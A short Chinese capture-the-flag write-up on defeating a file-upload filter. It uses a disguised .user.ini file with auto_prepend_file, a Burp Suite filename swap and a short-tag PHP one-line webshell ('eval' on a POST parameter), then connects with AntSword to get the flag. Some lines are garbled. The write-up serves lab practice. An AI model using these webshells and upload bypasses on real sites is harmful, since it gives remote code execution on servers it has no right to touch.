本题跟上一题一样先上传一个.user.ini文件文件内容是:auto_prepend_file=一句话木马将文件名改为.user.ini.png是为了绕过前端验证用bp抓包后需要把文件名改回为.user.ini防止因修改后缀名导致错误
上传成功后将包含一句话木马的文件也上传到该网站尝试修改一句话木马将: <?php @eval(_POST\['attack'\]);?\>改为 \_POST['attack']);?>使用大写来绕过限制

说明此时有更严格的校验,我们尝试给文件加上一个图片的文件头

发现也失败了是因为本题php被过滤了,但其实做法跟上题差不多,需要注意的是再编写一个短输出标签(方便绕过php)形式的一句话木马shortmuma.php替换为:<?=@eval($_POST['attack']); ?> 现在发现成功上传


现在就可以尝试使用蚁剑连接
连接成功拿到flag